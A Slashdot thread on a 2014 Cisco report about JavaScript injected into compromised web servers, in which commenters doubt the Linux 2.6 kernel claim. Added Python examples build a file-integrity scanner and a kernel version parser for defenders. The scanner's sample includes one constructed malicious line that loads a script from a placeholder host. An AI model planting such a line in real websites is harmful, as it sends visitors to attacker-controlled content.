
Speedy Attack Targets Web Servers With Outdated Linux Kernels

Posted by Soulskill
from the update-your-junk dept.
alphadogg writes "Web servers running a long-outdated version of the Linux kernel were attacked with dramatic speed over two days last week, according to Cisco Systems. All the affected servers were running the 2.6 version, first released in December 2003. 'When attackers discover a vulnerability in the system, they can exploit it at their whim without fear of it being remedied,' Cisco said. After the Web server has been compromised, the attackers slip in a line of JavaScript to other JavaScript files within the website. That code bounces the website's visitors to a second compromised host. 'The two-stage process allows attackers to serve up a variety of malicious content to the visitor,' according to Cisco."
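The summary describes the visible artifact of the compromise: one line of JavaScript appended to .js files that already existed on the site. An added example, not code from the Cisco report or from any comment in this thread, of the baseline integrity check a site operator would run to catch that. The file paths, file contents and the appended line are constructed for the demonstration; the second-stage host name is a placeholder.

```python
import hashlib
from typing import Dict, List, Optional, Tuple

# Constructed sample: a site file as it looked at baseline (known-good deploy) time.
CLEAN_JS = "(function(){\n  var site = 'demo';\n  console.log('hello ' + site);\n})();\n"

# Constructed sample: the same file after the kind of tampering the summary
# describes, one line appended at the end. The host name is a placeholder.
INJECTED_LINE = "document.write('<script src=\"//second-host.invalid/x.js\"></script>');\n"
TAMPERED_JS = CLEAN_JS + INJECTED_LINE


def sha256_text(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_manifest(files: Dict[str, str]) -> Dict[str, str]:
    """Record one SHA-256 per path. Run this on a known-good deploy and keep the
    result off the web host: an attacker who can append to .js files can also
    rewrite a manifest stored next to them."""
    return {path: sha256_text(content) for path, content in files.items()}


def scan(manifest: Dict[str, str], files: Dict[str, str]) -> List[Tuple[str, str]]:
    """Compare the live tree against the manifest and report every difference."""
    findings = []
    for path, digest in manifest.items():
        if path not in files:
            findings.append((path, "missing"))
        elif sha256_text(files[path]) != digest:
            findings.append((path, "modified"))
    for path in files:
        if path not in manifest:
            findings.append((path, "new"))
    return sorted(findings)


def appended_tail(baseline: str, current: str) -> Optional[str]:
    """If the live file is the baseline content plus something appended,
    return exactly what was appended; otherwise None (a rewrite, not an append)."""
    if current.startswith(baseline) and len(current) > len(baseline):
        return current[len(baseline):]
    return None


def demo() -> Tuple[List[Tuple[str, str]], Optional[str]]:
    # Constructed baseline and live trees; "js/extra.js" did not exist at baseline.
    baseline_tree = {"js/site.js": CLEAN_JS, "js/vendor.js": "var v=1;\n"}
    manifest = build_manifest(baseline_tree)
    live_tree = {"js/site.js": TAMPERED_JS, "js/vendor.js": "var v=1;\n", "js/extra.js": "x"}
    findings = scan(manifest, live_tree)
    tail = appended_tail(CLEAN_JS, live_tree["js/site.js"])
    return findings, tail


if __name__ == "__main__":
    for path, status in demo()[0]:
        print(f"{status:9s} {path}")
    print("appended:", demo()[1])
```

Hash comparison answers only "did this file change since the baseline"; the appended-tail check is what turns a "modified" hit into something a responder can read and then look for across the rest of the tree. Neither says how the write happened, which is the question the thread below keeps coming back to.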
  • No Details (Score:5, Insightful)

    by OverlordQ (264228) on Friday March 21, 2014 @03:20PM (#46545951) Journal

    So the webserver was compromised and JavaScript was inserted and their first thought is it's the kernel?

    • by jythie (914043)
      It would have been nice if they at least said WHICH kernel versions, or which web server, or which version of web server.

      I admit, I have some fairly obsolete (and difficult to upgrade) linux boxes running in my lab, this is the kind of detail I would kinda like to know....
      • by Anonymous Coward

        All Red Hat/CentOS versions plus nearly 100% of linux-based routers run 2.6

        • Red Hat's version numbers may or may not be relevant when you're trying to find out whether your kernel is vulnerable. Red Hat back ports a lot of security fixes, but doesn't change the kernel number.

          • by Penguinisto (415985) on Friday March 21, 2014 @04:54PM (#46546649) Journal

            It gets worse (or IMHO, less competent):

            Author Comment FTFA (bottom of page - emphasis mine):

            "We haven’t identified the initial attack vector. We have no reason to suspect that the attack isn’t via http. I’d be very interested to hear from any affected sys admins if they identify how the attackers gain access."

            In other words, they don't even know if it's the effing kernel at this point -all they know is that 2,000 some-odd websites have been bit, and they all use the absolute most common kernel version for webservers on the planet (2.6.x).

            Hell, for all we know it could be some commonly-shared crappy PHP script getting popped. :/

        • by gweihir (88907)

          2.6.32.61 is a currently supported longterm kernel release from kernel.org.

          • Don't worry, it's a crap report with no real analysis.
            Here is a short list of some of the actual compromised sites from the WhiteFir analysis report
            Compromised Websites

            archive.mrpools.co.uk Windows Server 2003
            blueprintbowling.com Windows Server 2008 R2
            hwy65mx.com Windows Server 2003
            jandjpoolspa.com Windows Server 2003
            mussotra.com Windows Server 2003

            Second Compromised Websites

            3d2print.eu FreeBSD
            7va.cc Windows Server 2008 R2
            babycaust.info Windows Server 2008
            banderil.com.ar Windows Serv
            • by gweihir (88907)

              Thanks, that does not look like an OS issue at all with that FreeBSD machine in there.

    • by markdavis (642305)

      Yeah, the article is extremely uninformative. They say 2.6 and yet RHEL/CentOS 6.5 are 2.6... so that means nothing as far as being "old" or "outdated".

      More likely to be an Apache vulnerability, but who knows. Maybe some other article could shed some light on it.

    • by sgt scrub (869860)

      Nobody in the security sector that I know believes there is a relationship between the kernel version and the attacks. The only reason I could see anyone mentioning it is if they had some reason for people to see Linux negatively. The vast majority of IPS/Firewalls out there taking Cisco space in the datacenters are based on Linux. I do not know of any of them that are not running kernel 2.6.X.

  • No mention of how the 2.6 kernel was compromised. Besides, 2.6 is quite ancient by any standards. Why'd anyone want to run it?
    • by higuita (129722)

      because it is the default kernel from RHEL: 2.6.18-238.12.1.el5

      • by X0563511 (793323)

        EL5 is, while supported, getting a bit old. Hell, EL7 is just around the corner!

        • Re:where's the door? (Score:4, Interesting)

          by hermitdev (2792385) on Friday March 21, 2014 @04:11PM (#46546315)
          While it is supported, and RH claims backwards compatibility, they do have an annoying habit of breaking things. I remember going from a point minor version of RHEL 5 (I think it was 5.5 to 5.6; it might have been an earlier release) to the next, and they broke the behavior of semaphores. In the prior version, a "sem_wait" would block until the semaphore was signaled, in the next version, it'd indicate errno EAGAIN. This was an unexpected change and required code changes for my company's apps at the time to busy wait when trying to acquire a semaphore.
        • by dbIII (701233)
          That's what you need to run the current version of some commercial software. While I don't have it on a webserver I do have centos5 (designed to be very similar to RHEL5) on a lot of machines. Of course they use an old version of java as well.
          Yes, I'd run 100% open source if there were not certain constraints if only to get off the old platform (and avoid shit like having to wait three months to get a software licence key!).
    • Re:where's the door? (Score:5, Informative)

      by Anonymous Coward on Friday March 21, 2014 @03:29PM (#46546031)

      I think it's pretty unfair to refer to kernel 2.6; subversions of 2.6 were in use in one form or another from 2003 to 2011. 3.0 was brought about because Linus randomly decided to up the version number one day, not because of any single significant change. Plenty of old distros that still have security support are running 2.6 kernels that are regularly patched and completely up to date security wise.

    • by jythie (914043)
      The same could be asked for why anyone would take down perfectly good, functioning servers to upgrade them to 3?
    • by gweihir (88907)

      2.6.32.61 is a currently supported longterm kernel from kernel.org. 2.6.32 in some variant is used in many virtual server setups.

  • by Nimey (114278) on Friday March 21, 2014 @03:29PM (#46546025) Homepage Journal

    All the affected servers were running the 2.6 version, first released in December 2003.

    Not even wrong. I guarandamntee you that none of the affected computers were actually running 2.6.0, and it wouldn't have been /that/ long ago that such an obviously stupid and ill-researched claim wouldn't have been posted.

    Soulskill, you /do/ understand that there were forty different versions of Linux in the 2.6 series, do you not? You do understand that the final 2.6 release was in August 2011 and it was numbered 2.6.39.4, which I know because I did 5 minutes of basic Googling?

    • by Bacon Bits (926911) on Friday March 21, 2014 @04:18PM (#46546439)

      You didn't read the article, did you? TFS is vague, but so is the article. The article contains no details about the vulnerability. It only contains information about the severity and locations of the attacks. Comments on the article add "Version 2.6.18 appeared to be particularly prevalent." The article is shockingly limited on details.

      Slashdot's editors often appear to be asleep at the wheel, but this time the editors weren't adding anything that wasn't in the original article.

    • by DRJlaw (946416)

      Not even wrong. I guarandamntee you that none of the affected computers were actually running 2.6.0, and it wouldn't have been /that/ long ago that such an obviously stupid and ill-researched claim wouldn't have been posted.

      Soulskill didn't write "the 2.6.0 version," he wrote "the 2.6 version." As in potentially 2.6.0 through 2.6.39.4. When posters refer to Windows, you don't automatically assume Windows 1.0. When posters refer to Windows XP, you don't automatically assume Windows XP RTM. Why would you

      • by DRJlaw (946416)

        And an unfortunate submission with "Michael" rather than "Martin" sucks the air out of the room. Wheeee...

      • by Nimey (114278)

        That's exactly my point. "The 2.6 version" is meaningless and Soulskill should have known better; there's a huge difference between 2.6.0 and 2.6.39.

        • by DRJlaw (946416)

          No, your point is to completely ignore TFA's statement that "We saw affected machines with a whole range of kernel 2.6 subversions."

          There's no point in demanding that the summary list the 36 subversions that are vulnerable and/or the 4 which are not when the source article does not include any such information to begin with. And whoever moderated your subsequent reply as insightful is a moron.

          • by Nimey (114278)

            If that's what TFA meant then that's what it should have said. As to the summary, instead of "the 2.6 version" (quoting TFA) it should have said something like "many Linux kernels in the 2.6 series", which would at least have not sounded so naively ignorant.

            Since TFA didn't bother clearly saying what versions are vulnerable (except, as you assert, in the comments) then it wasn't worthy of a /. post, which is my whole fucking point. English, motherfucker, do you speak it?

            • by DRJlaw (946416)

              Since TFA didn't bother clearly saying what versions are vulnerable (except, as you assert, in the comments) then it wasn't worthy of a /. post, which is my whole fucking point. English, motherfucker, do you speak it?

              Your point never addressed whether TFA was worthy of a /. post. Your point was directed at the article summary and Soulskill's editing up until 8:04 EDT. Once you finally noticed that TFA contradicted your rant, you suddenly chose to attack it. I can't read something that hasn't been writt

    • by gweihir (88907)

      And a 10 second look at www.kernel.org shows you that 2.6.32.61 is a currently supported longterm kernel version, with the last update in mid-2013. This thing may be old, but it is not abandoned or insecure.
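Several commenters in this thread make the same practical point from two directions: a distro kernel such as 2.6.18-238.12.1.el5 carries its backported fixes in the vendor build number after the dash (Red Hat does not bump the upstream number), while a kernel.org kernel such as 2.6.32.61 carries them in the stable point release, so "2.6" on its own says nothing about patch state. An added example, not from the Cisco report or from any commenter, that parses the release strings quoted above into those parts and compares vendor builds only when the comparison is meaningful. The distro-tag handling (el5, el6) is an assumption for RHEL/CentOS-style strings; other distributions format the suffix differently.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class KernelRelease:
    upstream: Tuple[int, int, int]   # series and base version, e.g. (2, 6, 18)
    stable: Optional[int]            # kernel.org stable point release, e.g. 61 in 2.6.32.61
    vendor: Tuple[int, ...]          # distro build number(s) after the '-', e.g. (238, 12, 1)
    dist: Optional[str]              # distro tag, assumed RHEL/CentOS style ('el5', 'el6')
    arch: Optional[str]              # trailing architecture, e.g. 'x86_64', if present


def parse_kernel_release(text: str) -> KernelRelease:
    """Split a `uname -r` style string into the parts that carry information."""
    upstream_part, _, vendor_part = text.strip().partition("-")
    nums = upstream_part.split(".")
    if len(nums) < 3 or not all(n.isdigit() for n in nums):
        raise ValueError(f"not a kernel release string: {text!r}")
    upstream = (int(nums[0]), int(nums[1]), int(nums[2]))
    stable = int(nums[3]) if len(nums) > 3 else None
    vendor, dist, arch = [], None, None
    for piece in (vendor_part.split(".") if vendor_part else []):
        if piece.isdigit():
            vendor.append(int(piece))
        elif re.fullmatch(r"el\d+", piece):   # assumption: RHEL-style tag
            dist = piece
        else:
            arch = piece                       # anything else, e.g. x86_64
    return KernelRelease(upstream, stable, tuple(vendor), dist, arch)


def same_upstream_base(a: str, b: str) -> bool:
    """Two strings share an upstream base (2.6.32) even if one is a distro build."""
    return parse_kernel_release(a).upstream == parse_kernel_release(b).upstream


def vendor_build_newer(a: str, b: str) -> Optional[bool]:
    """True if `a` is a newer vendor build than `b`, False if older or equal.
    None when the two are not comparable (different upstream base, different
    distro, or no distro tag at all): then the build numbers mean nothing
    relative to each other, and a plain version comparison would mislead."""
    ra, rb = parse_kernel_release(a), parse_kernel_release(b)
    if ra.upstream != rb.upstream or ra.dist != rb.dist or ra.dist is None:
        return None
    return ra.vendor > rb.vendor


if __name__ == "__main__":
    # Strings quoted in the comments above, plus one constructed EL6 example.
    for s in ("2.6.18-238.12.1.el5", "2.6.32.61", "2.6.39.4", "2.6.32-431.el6.x86_64"):
        print(s, "->", parse_kernel_release(s))
    print(vendor_build_newer("2.6.18-238.12.1.el5", "2.6.18-194.el5"))   # True
    print(vendor_build_newer("2.6.32.61", "2.6.32-431.el6.x86_64"))      # None
```

The None result is the point: a fleet report that ranks hosts by `uname -r` across distros, or that treats 2.6.32.61 and a 2.6.32-based EL6 build as the same thing, is not measuring patch state. Within one distro the build number orders the packages, and the package changelog (`rpm -q --changelog kernel` on RHEL/CentOS) is the record of which fixes a given build carries.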

  • by Gothmolly (148874) on Friday March 21, 2014 @03:33PM (#46546057)

    "All of the affected web servers that we have examined use the Linux 2.6 kernel."

    Right, because RHEL (and Centos) run 2.6.... so sampling ANY number of servers is likely going to show that they run 2.6.

    Is Slashdot just a click redirector these days? Do 'editors' remotely 'edit' anything?

    • by Nimey (114278)

      Do 'editors' remotely 'edit' anything?

      Only when they feel like it.

    • by mlts (1038732)

      TFA tells us nothing. Even the followup about 2.6.18 being the worst culprit and the note that upgrading the kernel will not help makes it even more pointless.

      My fix: yum upgrade, and if the update does grab a new kernel, reboot. There was a kernel bug (long since patched) a few years ago that allowed attacks past even SELinux... but if one is running a recent distro, this shouldn't be an issue.

      Of course, one should doublecheck what is likely the real culprit... applications like apache and its modules,

  • by Virtucon (127420) on Friday March 21, 2014 @03:35PM (#46546071)

    "We think your door is unlocked but we won't say which house it is or where it's located."

    Talk about vague.

    • These are always a double-edged sword. When releasing accurate details, you help administrators to secure their servers, but at the same time you give attackers more information to help them conduct their attack.
      • by JohnFen (1641097)

        One edge of that sword is a lot duller than the other. The cracker community is likely already well aware of how the exploit works (they do talk with each other frequently, after all), so it would most likely be a case of telling them what they already know.

  • Danger! 2.6 kernel! MASSIVE INFECTIONS! While we're at it, let's talk about Windows XP...
  • Becomes The Internet of unpatched easily pwned things.

  • There is a list of affected sites linked in the comments. The first one on the list is running FreeBSD. I did not bother checking the rest.
    • by JohnFen (1641097)

      So then it's very likely not a kernel exploit.

      • by kwark (512736)

        I found a compromised website on my company's shared hosting platform (which runs a 2.6 kernel (Debian/oldstable)). But the files were "infected" by an ftp account via proftpd on a machine running a 3.2 kernel (Debian/stable); the login was right on the first try. My guess is malware on the site owners' machines stealing ftp logins (which is old news).

    • by JohnFen (1641097)

      Oh, hell, looking through that list... there are Windows Server installations in there as well!

  • by cant_get_a_good_nick (172131) on Friday March 21, 2014 @06:24PM (#46547247)

    From the comments on the announce page, since (almost) nobody will go over there.

    The first site on compromise_1.txt [cisco.com] seems to be running “Apache/2.2.26 (FreeBSD) DAV/2 mod_ssl/2.2.26 OpenSSL/0.9.8y”, which does not quite sound like it’d be running Linux at all. As others have already pointed out, I would not blame this on a Linux kernel bug yet.

    So, it looks like the "old 2.6.x kernel releases" was really just a signal for "old nonupdated code".

    BTW: for those who bitch about "well the 2.6 line was patched and maintained all the way to 2011" they do have a line where they imply the 2.6 kernels are early kernels, not the latter 2.6.20 whatever ones, but it's not a well written article and is easy to miss.

  • by wjcofkc (964165) on Friday March 21, 2014 @06:27PM (#46547269)
    FTFA:

    All of the affected web servers that we have examined use the Linux 2.6 kernel.

    For clarity, the old kernel is a common indicator on the compromised hosts.

    Okay, so between 2003 and 2011 there have probably been 3 dozen versions of that kernel. The overwhelming majority of Linux based web servers run the vetted, thoroughly tested and patched, tried and true 2.6 series Linux Kernel. This makes me concerned Cisco doesn't understand what it means to run a production system. Also, what do they even mean by "web server"? Are we to assume Apache? Because there are alternatives in use... lots. Considering most Linux based web servers are running a variation of the 2.6 kernel, then of course that's where they will find the attacks (Duh anyone?). I would be much more interested in what web server we are talking about and any commonality between them over the kernel of the operating system. I am shaking my head trying to figure out what this article is really trying to communicate, especially since they practically shoot down most of their article with the "Update" at the top.

    Although users of Cisco’s Cloud Web Security solution are protected from this attack...

    Oh, I get it now.

  • I didn't realize Windows servers were running Linux 2.6 under the hood...fascinating! http://www.whitefirdesign.com/... [whitefirdesign.com]
  • by shipofgold (911683) on Friday March 21, 2014 @10:32PM (#46548711)

    The comments at the end of the CISCO article flesh out the fact that they noticed a line of malicious javascript at the end of a large number of .js files but they have no idea how it got there.

    In fact the list of JS files given includes many that are not even running on Linux servers.

    The author is irresponsible at best, and incompetent at worst...

    • by sclark46 (969374)

      The comments at the end of the CISCO article flesh out the fact that they noticed a line of malicious javascript at the end of a large number of .js files but they have no idea how it got there.

      In fact the list of JS files given includes many that are not even running on Linux servers.

      The author is irresponsible at best, and incompetent at worst...

      You are absolutely correct. I am appalled that /. even posted this with the title they used.
